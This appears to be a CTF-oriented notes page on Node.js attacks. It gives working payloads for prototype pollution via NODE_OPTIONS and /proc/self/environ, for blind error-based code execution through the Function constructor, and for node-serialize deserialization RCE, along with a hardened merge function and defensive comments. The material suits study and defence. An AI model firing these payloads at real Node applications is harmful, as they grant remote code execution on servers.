xct's notes
NodeJS

NodeJS Polluting environment

{"name":"xct","constructor":{"prototype":{"env":{"AAAA":"require('child_process').exec('cat *').stdout.pipe(process.stdout);//","NODE_OPTIONS":"--require /proc/self/environ"}}},"paper":10}
By polluting the environment we can inject a `--require` of a local file. If we point it at /proc/self/environ and place an environment variable there, the contents of that variable are executed as code (NODE_OPTIONS is read at process start, so the polluted value takes effect in a Node process started afterwards that inherits the environment). On a CTF challenge this worked because of a faulty merge method:
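merge(target, source) {
  // Deep-merges `source` into `target` and returns `target`.
  //
  // The version of this method that the payload at the top of the page abused
  // recursed into target[key] for every key that isValidKey() accepted, so a
  // source key of "constructor" followed by "prototype" walked from a plain
  // object up to Object.prototype, and the nested "env" object was written
  // there (process.env included). isValidKey() is not shown on this page; the
  // exploit succeeding implies it let those keys through.
  //
  // Hardened: prototype-walking keys are dropped, only own enumerable keys of
  // `source` are read, and recursion only descends into properties `target`
  // itself owns, never into ones inherited from its prototype chain.
  if (source == null) {
    return target;
  }
  for (const key of Object.keys(source)) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
      continue;
    }
    if (!this.isValidKey(key)) {
      continue;
    }
    const targetOwnsKey = Object.prototype.hasOwnProperty.call(target, key);
    if (targetOwnsKey && this.isObject(target[key]) && this.isObject(source[key])) {
      this.merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
},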

NodeJS Blind Error based Pollution

// Defender's note: with xct === 'constructor', ''['constructor']['constructor'] resolves to the
// Function constructor, so the string argument is compiled into a function and run; the execSync
// output is then thrown inside an Error and is only observable through the application's error
// message. Any sink that lets untrusted input reach Function/eval is the root cause to fix;
// hiding error details merely makes this particular variant blind.
[(function test(xct){return ''[!xct?'__proto__':'constructor'][xct]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\" PAYLOAD \").toString())')()]

NodeJS Deserialization RCE

Vulnerable Code

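// SECURITY: node-serialize's unserialize() evaluates serialized function bodies
// (the "_$ND_FUNC$_" marker shown in the exploit below), so calling it on
// attacker-controlled `data` is remote code execution. If the input only needs
// to carry plain data, JSON.parse() is the safe replacement; otherwise `data`
// must come from a trusted source before this call.
const s = require('node-serialize');
s.unserialize(data);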

Exploit

{"a":"_$ND_FUNC$_function(){console.log(\"xct\")}"}
{"a":"_$ND_FUNC$_function(){require('child_process').exec('...')}()"}